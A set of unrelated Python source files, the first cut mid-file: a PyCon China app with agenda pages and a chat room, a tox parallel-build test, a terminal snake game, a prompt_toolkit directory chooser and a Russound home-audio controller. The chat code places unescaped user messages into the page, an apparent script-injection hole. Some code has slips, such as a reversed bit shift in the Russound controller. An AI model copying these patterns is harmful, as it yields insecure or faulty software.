<div style="float:right;margin: 10px 10px 0 0;" >
已闭幕,可下载现场记录
<!--button onclick="milib.openUrl('http://cn.pycon.org/2015/proposals.html')" class="btn btn-info" >
提交主题
</button-->
</div>
</ul>
<div style="clear:both"></div>
<div style="padding:0px 15px 10px 15px">
PyCon 是全球 Pythoneer 最盛大的年度聚会,由 PSF(Python 基金会)支持,致力于营造愉快的多元化的 Python 技术主题大会. PyConChina 是由 CPyUG(华蠎用户组)获得授权举办的 中国PyCon 年会. 迄今已是第五届, 目前大会已结束,大会幻灯,视频,录音可以通过本App下载.
</div>
</div>
</nav>
<div class="table-responsive" style='border:0px'>
<div class="container">
<div class="row" style='border:0px;padding-left:10px;padding-right:10px;padding-top:10px'>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/beijing/agenda'" >
<div class="col-lg-4 circle circle-view">
<span style="">
<br />
<br />
<br />
<a class="circle-text">
PyCon 北京
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/shanghai/agenda'" >
<div class="col-lg-4 circle circle-view">
<span>
<br />
<br />
<br />
<a class="circle-text" >
PyCon 上海
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/guangzhou/agenda'" >
<div class="col-lg-4 circle circle-view">
<span>
<br />
<br />
<br />
<a class="circle-text" >
PyCon 广州
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
</div>
</div>
</div>
<script language='javascript'>milib.showDrawerMenu('{"menu":[{"title":"北京","url":"http://127.0.0.1:8080/beijing/agenda","icon":""},{"title":"上海","url":"http://127.0.0.1:8080/shanghai/agenda","icon":""},{"title":"广州","url":"http://127.0.0.1:8080/guangzhou/agenda","icon":""},{"title":"聊天室(New)","url":"http://127.0.0.1:8080/chat","icon":""}]}')</script>
"""
return template(PAGE_TEMP % (JS, CONTENT))
def _get_json_content():
jurl = 'http://cn.pycon.org/2015/pycon.json'
jfile = ROOT+'/pycon2.json'
if not os.path.exists(jfile):
data = urllib2.urlopen(jurl)
fd = open(jfile,'w')
content = data.read()
fd.write(content)
data.close()
fd.close()
else:
fd = open(jfile)
content =fd.read()
fd.close()
return content
def get_speakers():
content = _get_json_content()
jdata = json.loads(content)
speakers = jdata['speakers']
return speakers
def beijing():
return _agenda('beijing',u'PyCon 北京日程', u'http://event.31huiyi.com/118591776')
def shanghai():
return _agenda('shanghai',u'PyCon 上海日程', u'http://event.31huiyi.com/118022165')
def guangzhou():
return _agenda('guangzhou',u'PyCon 广州日程', u'http://event.31huiyi.com/118545334')
def _agenda(wh, title, url):
content = _get_json_content()
jdata = json.loads(content)
agd = jdata['agenda'][wh]
J = u"""
$.get('/speakers/', null, function(data){
$('th').each(function(){
var val = $(this).html()
if (val=='speaker') {
$(this).html('主题')
} else if (val == 'time') {
$(this).html('时间')
} else if (val == 'topic') {
$(this).html('')
}
});
$('td').each(function(){
var val = $(this).html()
if (typeof(data[val])!="undefined") {
//console.log(data[val]['topic']['title'])
//if (data[val]['topic']['audio']!=undefined) {
$(this).html(data[val]['topic']['title']+" - "+data[val]['name']+"<div style='color:grey'>"+data[val]['topic']['preview']+"</div><br /><div>"+
(data[val]['topic']['video']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['video']+"')\\">下载视频</a> ":"")+
(data[val]['topic']['audio']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['audio']+"')\\">下载录音</a> ":"")+
(data[val]['topic']['slide']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['slide']+"')\\">下载幻灯</a>":"")+
"</div>")
}
})
});"""
O = u"""<h4 class='tt float-left'>%s</h4>
<div style="float:right;margin: 10px 10px 0 0;" >
<button onclick="milib.openUrl('%s')" class="btn btn-info" >
报名参加
</button>
</div>
<div style='clear:both;padding-bottom:10px'></div>
<table class="table table-bordered table-hover">
<tr><th>日期</th><td>%s</td></tr>
<tr><th>地点</th><td>%s<br />%s</td></tr>
<tr><th>交通</th><td>%s</td></tr>
<tr><th>事件</th><td>%s</td></tr>
<tr><th>注意</th><td>%s</td></tr>
</table>
""" % (title,
url,
agd['date'],
agd['address'],
agd["maplink"],
agd['traffic'],
agd['venue'],
agd['notices']
)
L = u"""<div style='text-align:center;padding:10px'><button onclick="milib.openUrl('%s')" class="btn btn-lg btn-success" >报名参加</button></div>""" % url
M = u"<h5 class='tt'>早上</h5>"
for item in agd['morning']:
M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
M = M+u"<h5 class='tt'>中午</h5>"
for item in agd['noon']:
M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
M = M+u"<h5 class='tt'>下午</h5>"
for item in agd['afternoon']:
M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
M = M+u"<h5 class='tt'>闪电演讲</h5>"
for item in agd['lightening_talks']:
M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
M = M+u"<h5 class='tt'>已取消</h5>"
if agd['cancel_talks']:
for item in agd['cancel_talks']:
M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
D = u""""""
O = O+M
return template(PAGE_TEMP % (J,O+D))
def chat():
J="""
var connectToServer = function () {
//Connect to your server here
var mobileChatSocket = new SockJS('http://quseit.cn:6975/mobilechat');
mobileChatSocket.onopen = function () {
clearInterval(connectRetry);
$('.connect-status')
.removeClass('disconnected')
.addClass('connected')
.text('已连接');
};
//Receive message from server
mobileChatSocket.onmessage = function (e) {
$('#chatBox').html($('#chatBox').html() + '</br>' + e.data);
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
};
mobileChatSocket.onclose = function () {
clearInterval(connectRetry);
connectRetry = setInterval(connectToServer, 1000);
$('.connect-status')
.removeClass('connected')
.addClass('disconnected')
.text('Disconnected');
};
//Send your message to the server.
$('#sendButton').on('click', function () {
if ($('#userName').val() != '') {
if ($('#messageBox').val() != '') {
mobileChatSocket.send($('#userName').val() + ': ' + $('#messageBox').val());
document.getElementById("messageBox").value = '';
}
} else {
alert('请先设置昵称');
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
}
});
//Prevent enter refreshing the page, it sends the text from now on
$('#messageBox').keydown(function (e) {
if (e.keyCode == 13) { // 13 is enter
if ($('#userName').val() != '') {
if ($('#messageBox').val() != '') {
mobileChatSocket.send($('#userName').val() + ': ' + $('#messageBox').val());
document.getElementById("messageBox").value = '';
}
} else {
alert('请先设置昵称');
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
}
return false;
}
});
//Prevent enter refreshing the page
$('#messageBox').keydown(function (e) {
if (e.keyCode == 13) { // 13 is enter
return false;
}
});
$('#userName').bind('input propertychange', function() {
$('#mynick').html($(this).val())
});
};
var connectRetry = setInterval(connectToServer, 1000);
"""
C="""
<style>
html {
position: relative;
min-height: 100%;
}
body {
margin-bottom: 60px;
}
.footer {
position: absolute;
bottom: 0;
width: 100%;
height: 60px;
background-color: #f5f5f5;
}
.container {
width: auto;
max-width: 680px;
padding: 0 15px;
}
.container .text-muted {
margin: 20px 0;
}
#signInForm, #messageForm {
margin: 0px;
margin-bottom: 1px;
}
#chatBox {
padding:2px;
font-family: '宋体','Arial';
font-size: 13px;
color: black;
border: 1px #eee solid;
width: 100%%;
overflow: scroll;
height:150px;
margin-left: 1px;
}
#message {
width: 100%%;
height: 22px;
float: left;
margin-left: 1px;
margin-top: 1px;
}
.disconnected {
color: red;
}
.connected {
color: green;
}
.status {
font-size:13px
}
</style>
<div class="container">
<h4>PyConChina 聊天室 <span style='padding-top:5px' class="status">( 状态:<span class="connect-status disconnected">断线</span> )</span> <span style='font-size:13px'><a data-toggle="modal" data-target="#myModal" href='#' id='mynick' style='float:right'>设置昵称</a></span></h4>
<hr />
<span style='color:grey'>无认证,不存历史纪录,不支持刷新。<br/>想看看谁在?吼一嗓子。</span>
<div id="chatBox"></div>
</div>
<script src="http://cdnjs.cloudflare.com/ajax/libs/sockjs-client/0.3.4/sockjs.min.js"></script>
<footer class="footer">
<div class="container" style='padding-top:10px'>
<form id="messageForm" class="form-group">
<input id="messageBox" type="text" value="" class='form-control' placeholder='回车发言'>
<!--input id="sendButton" type="button" value="发送" style="width:15%%;float:right" class="btn btn-success"-->
</form>
</div>
</footer>
<!-- 模态框(Modal) -->
<div class="modal fade" id="myModal" tabindex="-1" role="dialog"
aria-labelledby="myModalLabel" aria-hidden="true">
<form id="signInForm" class="form-group">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close"
data-dismiss="modal" aria-hidden="true">
×
</button>
<h4 class="modal-title" id="myModalLabel">
设置昵称
</h4>
</div>
<div class="modal-body">
<input id="userName" type="text" class='form-control'>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="changeNameButton" name="changeName" data-dismiss="modal">
设置昵称
</button>
</div>
</div><!-- /.modal-content -->
</form>
</div><!-- /.modal -->
"""
return template(PAGE_TEMP % (J,C))
######### WEBAPP ROUTERS ###############
app = Bottle()
app.route('/', method='GET')(home)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
app.route('/assets/:filepath', method='GET')(server_static)
app.route('/beijing/agenda', method='GET')(beijing)
app.route('/shanghai/agenda', method='GET')(shanghai)
app.route('/guangzhou/agenda', method='GET')(guangzhou)
app.route('/speakers/', method='GET')(get_speakers)
app.route('/chat', method='GET')(chat)
try:
server = MyWSGIRefServer(host="127.0.0.1", port="8080")
app.run(server=server,reloader=False)
except Exception,ex:
print "Exception: %s" % repr(ex)
|
test_package_parallel.py | import traceback
import py
from tox.session.commands.run import sequential
def test_tox_parallel_build_safe(initproj, cmd, mock_venv, monkeypatch):
initproj(
"env_var_test",
filedefs={
"tox.ini": """
[tox]
envlist = py
install_cmd = python -m -c 'print("ok")' -- {opts} {packages}'
[testenv]
commands = python -c 'import sys; print(sys.version)'
"""
},
)
# we try to recreate the following situation
# t1 starts and performs build
# t2 starts, but is blocked from t1 build lock to build
# t1 gets unblocked, t2 can now enter
# t1 is artificially blocked to run test command until t2 finishes build
# (parallel build package present)
# t2 package build finishes both t1 and t2 can now finish and clean up their build packages
import tox.package
import threading
t1_build_started = threading.Event()
t1_build_blocker = threading.Event()
t2_build_started = threading.Event()
t2_build_finished = threading.Event()
invoke_result = {}
def invoke_tox_in_thread(thread_name):
try:
result = cmd("--parallel--safe-build", "-vv")
except Exception as exception:
result = exception, traceback.format_exc()
invoke_result[thread_name] = result
prev_build_package = tox.package.build_package
with monkeypatch.context() as m:
def build_package(config, session):
t1_build_started.set()
t1_build_blocker.wait()
return prev_build_package(config, session)
m.setattr(tox.package, "build_package", build_package)
prev_run_test_env = sequential.runtestenv
def run_test_env(venv, redirect=False):
t2_build_finished.wait()
return prev_run_test_env(venv, redirect)
m.setattr(sequential, "runtestenv", run_test_env)
t1 = threading.Thread(target=invoke_tox_in_thread, args=("t1",))
t1.start()
t1_build_started.wait()
with monkeypatch.context() as m:
def build_package(config, session):
t2_build_started.set()
try:
return prev_build_package(config, session)
finally:
t2_build_finished.set()
m.setattr(tox.package, "build_package", build_package)
t2 = threading.Thread(target=invoke_tox_in_thread, args=("t2",))
t2.start()
# t2 should get blocked by t1 build lock
t2_build_started.wait(timeout=0.1)
assert not t2_build_started.is_set()
t1_build_blocker.set() # release t1 blocker -> t1 can now finish
# t1 at this point should block at run test until t2 build finishes
t2_build_started.wait()
t1.join() # wait for both t1 and t2 to finish
t2.join()
# all threads finished without error
for val in invoke_result.values():
if isinstance(val, tuple):
assert False, "{!r}\n{}".format(val[0], val[1])
err = "\n".join(
"{}=\n{}".format(k, v.err).strip() for k, v in invoke_result.items() if v.err.strip()
)
out = "\n".join(
"{}=\n{}".format(k, v.out).strip() for k, v in invoke_result.items() if v.out.strip()
)
for val in invoke_result.values():
assert not val.ret, "{}\n{}".format(err, out)
assert not err
# when the lock is hit we notify
lock_file = py.path.local().join(".tox", ".package.lock")
msg = "lock file {} present, will block until released".format(lock_file)
assert msg in out
# intermediate packages are removed at end of build
t1_package = invoke_result["t1"].session.getvenv("py").package
t2_package = invoke_result["t1"].session.getvenv("py").package
assert t1 != t2
assert not t1_package.exists()
assert not t2_package.exists()
# the final distribution remains
dist_after = invoke_result["t1"].session.config.distdir.listdir()
assert len(dist_after) == 1
sdist = dist_after[0]
assert t1_package != sdist
|
snake.py | #!/usr/bin/env python2
import sys
import os
import tty
import select
import json
import termios
from copy import deepcopy as copy
from multiprocessing import Process
from time import sleep
from random import randint
class Snake:
def __init__(self):
self.height = 20
self.width = 20
self.length = 1
self.sleep_time = 0.1
self.path = []
self.apples = []
self.start_pos = [1,2]
self.path.append(self.start_pos)
# Char stuff
self.border_char = '|'
self.snake_char = '*'
self.padd_char = ' '
self.apple_char = '~'
self.spider_char = '$'
self.last_input = None
self.dir = 'e'
self.score = 0
# Read the highsores.
self.hs = self.Highscore()
# some test data!
self.add_new_apple()
# Set some terminal stuff
fd = sys.stdin.fileno()
self.old_tty = termios.tcgetattr(fd)
tty.setraw(sys.stdin.fileno())
def __exit__(self):
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, self.old_tty)
class Highscore():
def __init__(self):
self.file = "highscores.json"
try:
fh = open(self.file)
self.data = json.loads(fh.read())
self.highscores = self.data['Highscores']
fh.close()
except:
print("File dosn't exist, or corrupt file!")
self.data = {}
self.data['Highscores'] = []
self.highscores = self.data['Highscores']
# finally:
def add_score(self, nick, score):
for entry in self.highscores:
if entry['nick'] == nick:
print("Nick exist override the score!")
if score >= entry['score']:
entry['score'] = score
return
self.highscores.append({'nick': nick, 'score': score})
def save(self):
try:
fh = open(self.file, 'w+')
fh.write(json.dumps(self.data, sort_keys=True, indent=3, separators=(',', ': ')))
fh.close()
except:
print("Failed to save highscores")
def empty_array(self, array):
for i in range(0,len(array)):
array[i] = self.padd_char
def read_input(self):
while select.select([sys.stdin],[], [], 0) == ([sys.stdin], [], []):
return sys.stdin.read(1)
return None
def draw(self):
data_map = []
row = []
# Create the right length of a row
for i in range(0,self.width+2):
row.append(self.padd_char)
row[0] = self.border_char
row[self.width+1] = self.border_char
# Create the right lenght of a colloum
# and fill it with copy's of row
for i in range(0,self.height+2):
data_map.append(copy(row))
# Create the top and bottom border lines
for u in {0, self.height+1}:
for i in range(0, self.width+2):
data_map[u][i] = self.border_char
for apple in self.apples:
data_map[apple[1]+1][apple[0]+1] = self.apple_char
for pos in self.path:
data_map[pos[1]+1][pos[0]+1] = self.snake_char
# Clear the screen
print("\r\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
# Print a nice header
for u in range(0, self.width + 2):
print(self.border_char),
print("\r\n%c Snake%*c" % (self.border_char, self.width*2-(17), ' ')),
print("Score: %3d %c" % (self.score, self.border_char)),
# Print the map
print('\r')
for i in range(0,self.height+2):
for u in range(0,self.width+2):
row = data_map[i]
print(row[u]) ,
print('\r')
def got_apple(self, pos):
for apple in self.apples:
if pos == apple:
return True
return False
def add_new_apple(self):
x = randint(0,self.width-1)
y = randint(0,self.height-1)
pos = [x,y]
if not self.got_apple(pos):
self.apples.append(pos)
def self_hit(self, pos):
for loc in self.path:
if loc == pos:
return True
return False
# n
# e w
# s
# w
# a d
# s
def logic(self):
self.last_input = self.read_input()
if self.last_input is not None:
if self.last_input == 'a' and not self.dir == 'e':
print "Setting dir: w"
self.dir = 'w'
elif self.last_input == 'w' and not self.dir == 's':
print "Setting dir: n"
self.dir = 'n'
elif self.last_input == 'd' and not self.dir == 'w':
print "Setting dir: e"
self.dir = 'e'
elif self.last_input == 's' and not self.dir == 'n':
print "Setting dir: s"
self.dir = 's'
elif self.last_input == 'q': #quits the game
self.__exit__()
exit()
self.last_input = None
last_pos = self.path[-1]
new_pos = copy(last_pos)
if self.dir is 'e':
new_pos[0] += 1
if self.dir is 'w':
new_pos[0] -= 1
if self.dir is 'n':
new_pos[1] -= 1
if self.dir is 's':
new_pos[1] += 1
if new_pos[0] >= self.width:
new_pos[0] = 0
if new_pos[0] < 0:
new_pos[0] = self.width-1
if new_pos[1] >= self.height:
new_pos[1] = 0
if new_pos[1] < 0:
new_pos[1] = self.height-1
if self.self_hit(new_pos):
return False
self.path.append(new_pos)
# if not self.extend:
if not self.got_apple(new_pos):
self.path.pop(0)
else:
self.apples.pop(self.apples.index(new_pos))
self.add_new_apple()
self.score += 1
return True
def run(self):
while 1:
if not self.logic():
self.__exit__()
nick = raw_input("Nickname: ")
self.hs.add_score(nick, self.score)
self.hs.save()
print("Dead!")
break;
self.draw()
sleep(self.sleep_time)
def start(self):
# hs = Highscore()
self.run()
#p = Process(target=self.run)
#p.start()
#while 1:
# sleep(1)
# self.last_input = raw_input()
# print self.path
# sleep(4)
#p.join()
#a = Snake.Highscore()
#a.add_score("0st3n", randint(0,1000))
#a.save()
if __name__ == '__main__':
# pass
a = Snake()
a.start()
a.__exit__() |
choose_remote_dir.py | import difflib
import logging
import os
import threading
import time
from enum import Enum
from queue import Empty, Queue
from prompt_toolkit.application.current import get_app
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout import HSplit, VSplit
from prompt_toolkit.layout.containers import Window
from prompt_toolkit.layout.controls import FormattedTextControl
from prompt_toolkit.widgets import TextArea
from ..pubsub import Messages
from .base import BaseScreen
from .loading import LoadingIndicator
class RemoteDirMessages(Enum):
"""
Messages that are only used internally
"""
NEW_SUBDIRECTORIES_WALKED = "NEW_SUBDIRECTORIES_WALKED"
SUBDIRECTORY_WALKER_STATUS_CHANGE = "SUBDIRECTORY_WALKER_STATUS_CHANGE"
class Completions(object):
def __init__(self):
self._completions = None
self._control = FormattedTextControl("")
self._current_index = None
self._margin_control = FormattedTextControl("")
self._margin = Window(self._margin_control, width=2)
self.container = VSplit([self._margin, Window(self._control)])
def set_completions(self, completions):
self._completions = completions
self._current_index = 0 if completions else None
self._render()
def move_selection_down(self):
if self._current_index is not None and self._completions is not None:
self._current_index = (self._current_index + 1) % len(
self._completions
)
self._render()
def move_selection_up(self):
if self._current_index is not None and self._completions is not None:
self._current_index = (self._current_index - 1) % len(
self._completions
)
self._render()
def current_selection(self):
if self._current_index is not None and self._completions is not None:
return self._completions[self._current_index]
def _render(self):
if self._completions is None:
self._control.text = ""
else:
self._control.text = "\n".join(self._completions)
margin_lines = []
for icompletion in range(len(self._completions)):
margin_lines.append(
"> " if icompletion == self._current_index else (" " * 2)
)
margin_text = "\n".join(margin_lines)
self._margin_control.text = margin_text
class AsyncCompleterStatus(object):
def __init__(self):
self._loading_indicator = LoadingIndicator()
self._status = "IDLE"
self._current_path = None
self._control = FormattedTextControl()
self.container = HSplit(
[Window(height=1), Window(self._control, height=1)], height=2
)
self._thread = None
self._stop_event = threading.Event()
self._start_updating_loading_indicator()
def _render(self):
if self._status == "IDLE":
self._control.text = ""
else:
if self._current_path is not None:
self._control.text = "{} Fetching subdirectories of {}".format(
self._loading_indicator.current(), self._current_path
)
else:
self._control.text = self._loading_indicator.current()
def set_status(self, status, current_path=None):
self._status = status
self._current_path = current_path
self._render()
def _start_updating_loading_indicator(self):
def run():
app = get_app()
while not self._stop_event.is_set():
self._loading_indicator.next()
self._render()
time.sleep(0.5)
app.invalidate()
self._thread = threading.Thread(target=run, daemon=True)
self._thread.start()
def stop(self):
self._stop_event.set()
class AsyncCompleter(object):
def __init__(self, exchange, get_paths_in_directory):
self._exchange = exchange
self._queue = Queue()
self._get_paths_in_directory = get_paths_in_directory
self._completions_cache = {}
self._stop_event = threading.Event()
self.current_status = "IDLE"
self.start()
def cache_completions(self, directory):
self._queue.put(directory)
def get_subdirectories(self, directory):
return self._completions_cache.get(directory)
def start(self):
def run():
while not self._stop_event.is_set():
try:
path = self._queue.get(timeout=0.1)
if path not in self._completions_cache:
# path has not been fetched already
logging.info(
"Retrieving completions for {}".format(path)
)
self.current_status = "BUSY"
self._publish_busy(path)
try:
subdirectories = self._get_paths_in_directory(path)
self._completions_cache[path] = subdirectories
self._exchange.publish(
RemoteDirMessages.NEW_SUBDIRECTORIES_WALKED
)
except Exception:
logging.exception(
"Error fetching subdirectories of {}".format(
path
)
)
except Empty:
if self.current_status != "IDLE":
self.current_status = "IDLE"
self._publish_idle()
self._thread = threading.Thread(target=run, daemon=True)
self._thread.start()
def _publish_busy(self, path):
self._exchange.publish(
RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE, path
)
def _publish_idle(self):
self._exchange.publish(
RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE
)
class RemoteDirectoryPromptScreen(BaseScreen):
def __init__(self, exchange, get_paths_in_directory):
super().__init__()
self.use_default_bindings = False
self._exchange = exchange
self._input = TextArea(text="/project/", multiline=False)
self._buffer = self._input.buffer
self._buffer.cursor_position = len(self._buffer.text)
self._completions_component = Completions()
self._completer = AsyncCompleter(exchange, get_paths_in_directory)
self._completer_status_component = AsyncCompleterStatus()
self._bottom_toolbar = Window(
FormattedTextControl(
"[tab] Enter selected directory "
"[return] Choose selected directory "
"[arrows] Navigation "
"[C-c] Quit"
),
height=1,
style="reverse",
)
self._container = HSplit(
[
Window(height=1),
Window(
FormattedTextControl(
"Choose directory to synchronize to on Faculty Platform: "
),
height=1,
),
self._input,
Window(height=1),
self._completions_component.container,
self._completer_status_component.container,
]
)
self.main_container = HSplit(
[VSplit([Window(width=2), self._container]), self._bottom_toolbar]
)
self._buffer.on_text_changed += self._handle_text_changed
self.bindings = KeyBindings()
@self.bindings.add("down")
def _(event):
self._completions_component.move_selection_down()
@self.bindings.add("up")
def _(event):
self._completions_component.move_selection_up()
@self.bindings.add("tab")
def _(event):
current_selection = self._completions_component.current_selection()
if current_selection is not None:
self._buffer.cursor_position = 0
self._buffer.text = current_selection + "/"
self._buffer.cursor_position = len(self._buffer.text)
@self.bindings.add("enter")
def _(event):
current_selection = self._completions_component.current_selection()
self._exchange.publish(
Messages.VERIFY_REMOTE_DIRECTORY, current_selection
)
@self.bindings.add("c-c")
def _(event):
self._exchange.publish(Messages.STOP_CALLED)
self._exchange.subscribe(
RemoteDirMessages.NEW_SUBDIRECTORIES_WALKED,
lambda _: self._handle_text_changed(),
)
self._exchange.subscribe(
RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE,
lambda path: self._handle_walker_status_change(path),
)
def on_mount(self, app):
app.layout.focus(self.main_container)
self._handle_text_changed()
def _handle_text_changed(self, _=None):
current_text = self._buffer.text
directory = os.path.dirname(current_text)
subdirectories = self._completer.get_subdirectories(directory)
if subdirectories is None:
self._completer.cache_completions(directory)
else:
current_basename = os.path.basename(current_text)
remote_basenames = {
os.path.basename(os.path.normpath(subdirectory)): subdirectory
for subdirectory in subdirectories
}
matching_basenames = difflib.get_close_matches(
current_basename, remote_basenames.keys(), cutoff=0.0, n=20
)
matching_subdirectories = [
remote_basenames[basename] for basename in matching_basenames
]
completions = [directory] + matching_subdirectories
self._completions_component.set_completions(completions)
def _handle_walker_status_change(self, path):
self._completer_status_component.set_status(
self._completer.current_status, path
)
|
russound.py | #!/usr/bin/env python3
"""
Polyglot v2 node server Russound status and control via RNET protocol
Copyright (C) 2020 Robert Paauwe
"""
try:
import polyinterface
except ImportError:
import pgc_interface as polyinterface
import sys
import time
import datetime
import requests
import threading
import socket
import math
import re
import russound_main
import node_funcs
from nodes import zone
from rnet_message import RNET_MSG_TYPE
LOGGER = polyinterface.LOGGER
@node_funcs.add_functions_as_methods(node_funcs.functions)
class Controller(polyinterface.Controller):
id = 'russound'
hint = [0,0,0,0]
def __init__(self, polyglot):
super(Controller, self).__init__(polyglot)
self.name = 'Russound'
self.address = 'rnet'
self.primary = self.address
self.configured = False
self.rnet = None
self.sock = None
self.mesg_thread = None
self.source_status = 0x00 # assume all sources are inactive
self.params = node_funcs.NSParameters([{
'name': 'IP Address',
'default': 'set me',
'isRequired': True,
'notice': 'IP Address of serial network interface must be set',
},
{
'name': 'Port',
'default': '0',
'isRequired': True,
'notice': 'Serial network interface port must be set',
},
{
'name': 'Network Protocol',
'default': 'UDP',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 1',
'default': 'Zone 1',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 2',
'default': 'Zone 2',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 3',
'default': 'Zone 3',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 4',
'default': 'Zone 4',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 5',
'default': 'Zone 5',
'isRequired': False,
'notice': '',
},
{
'name': 'Zone 6',
'default': 'Zone 6',
'isRequired': False,
'notice': '',
},
])
self.poly.onConfig(self.process_config)
# Process changes to customParameters
def process_config(self, config):
(valid, changed) = self.params.update_from_polyglot(config)
if changed and not valid:
LOGGER.debug('-- configuration not yet valid')
self.removeNoticesAll()
self.params.send_notices(self)
elif changed and valid:
LOGGER.debug('-- configuration is valid')
self.removeNoticesAll()
self.configured = True
# TODO: Run discovery/startup here?
elif valid:
LOGGER.debug('-- configuration not changed, but is valid')
# is this necessary
#self.configured = True
def start(self):
LOGGER.info('Starting node server')
self.set_logging_level()
self.check_params()
# Open a connection to the Russound
if self.configured:
if self.params.get('Network Protocol') == 'UDP':
self.rnet = russound_main.RNETConnection(self.params.get('IP Address'), self.params.get('Port'), True)
else:
self.rnet = russound_main.RNETConnection(self.params.get('IP Address'), self.params.get('Port'), False)
self.rnet.Connect()
self.discover()
if self.rnet.connected:
# Start a thread that listens for messages from the russound.
self.mesg_thread = threading.Thread(target=self.rnet.MessageLoop, args=(self.processCommand,))
self.mesg_thread.daemon = True
self.mesg_thread.start()
# Query each zone
self.rnet.get_info(0, 0x0407)
time.sleep(2)
self.rnet.get_info(1, 0x0407)
time.sleep(2)
self.rnet.get_info(2, 0x0407)
time.sleep(2)
self.rnet.get_info(3, 0x0407)
time.sleep(2)
self.rnet.get_info(4, 0x0407)
time.sleep(2)
self.rnet.get_info(5, 0x0407)
LOGGER.info('Node server started')
else:
LOGGER.info('Waiting for configuration to be complete')
def longPoll(self):
pass
def shortPoll(self):
pass
def query(self):
for node in self.nodes:
self.nodes[node].reportDrivers()
def discover(self, *args, **kwargs):
LOGGER.debug('in discover() - Setting up zones')
for z in range(1,7):
param = 'Zone ' + str(z)
node = zone.Zone(self, self.address, 'zone_' + str(z), self.params.get(param))
node.setRNET(self.rnet)
try:
old = self.poly.getNode('zone_' + str(z))
if old['name'] != self.params.get(param):
self.delNode('zone_' + str(z))
time.sleep(1) # give it time to remove from database
except:
LOGGER.warning('Failed to delete node ' + param)
self.addNode(node)
# configuation should hold name for each zone and name for each
# source. Here we should map the zone names to what is reported
# by the russound and create zone nodes. When we create the
# zone node, pass in the source name list.
# Delete the node server from Polyglot
def delete(self):
LOGGER.info('Removing node server')
def stop(self):
LOGGER.info('Stopping node server')
def update_profile(self, command):
st = self.poly.installprofile()
return st
def check_params(self):
# NEW code, try this:
self.removeNoticesAll()
if self.params.get_from_polyglot(self):
LOGGER.debug('All required parameters are set!')
self.configured = True
else:
LOGGER.debug('Configuration required.')
LOGGER.debug('IP Address = ' + self.params.get('IP Address'))
LOGGER.debug('Port = ' + self.params.get('Port'))
self.params.send_notices(self)
def remove_notices_all(self, command):
self.removeNoticesAll()
def set_source_selection(self, state, source):
source_map = ['GV1', 'GV2', 'GV3', 'GV4', 'GV5', 'GV6']
# if state is on, set source bit else clear source bit
if state == 0x01:
LOGGER.info('Source ' + str(source+1) + ' is ACTIVE')
self.source_status = self.source_status | (1 >> source)
self.reportCmd(source_map[source], 1, 25)
self.setDriver(source_map[source], 1)
else:
LOGGER.info('Source ' + str(source+1) + ' is INACTIVE')
self.source_status = self.source_status & ~(1 >> source)
self.reportCmd(source_map[source], 0, 25)
self.setDriver(source_map[source], 0)
def processCommand(self, msg):
zone = msg.TargetZone() + 1
zone_addr = 'zone_' + str(zone)
if zone >= 0x70:
LOGGER.debug('Message target not a zone: ' + str(zone))
return
if msg.MessageType() == RNET_MSG_TYPE.ZONE_STATE:
# It looks like the zone state is in the TS field.
LOGGER.debug(' -> Zone %d state = 0x%x' % (msg.TargetZone(), msg.EventTS()))
zone_addr = 'zone_' + str(msg.TargetZone() + 1)
self.nodes[zone_addr].set_power(int(msg.EventTS()))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_SOURCE:
LOGGER.debug(' -> Zone %d source = 0x%x' % (zone, msg.MessageData()[19]+1))
self.nodes[zone_addr].set_source(int(msg.MessageData()[19]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_VOLUME:
# See what we get here. Then try to update the actual node
# for the zone
LOGGER.debug(' -> Zone %d volume = 0x%x' % (zone, msg.EventData()))
self.nodes[zone_addr].set_volume(int(msg.EventData()))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_BASS:
LOGGER.debug(' -> Zone %d bass = 0x%x' % (zone, msg.MessageData()[20]))
self.nodes[zone_addr].set_bass(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_TREBLE:
LOGGER.debug(' -> Zone %d treble = 0x%x' % (zone, msg.MessageData()[20]))
self.nodes[zone_addr].set_treble(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_BALANCE:
LOGGER.debug(' -> Zone %d balance = 0x%x' % (zone, msg.MessageData()[20]))
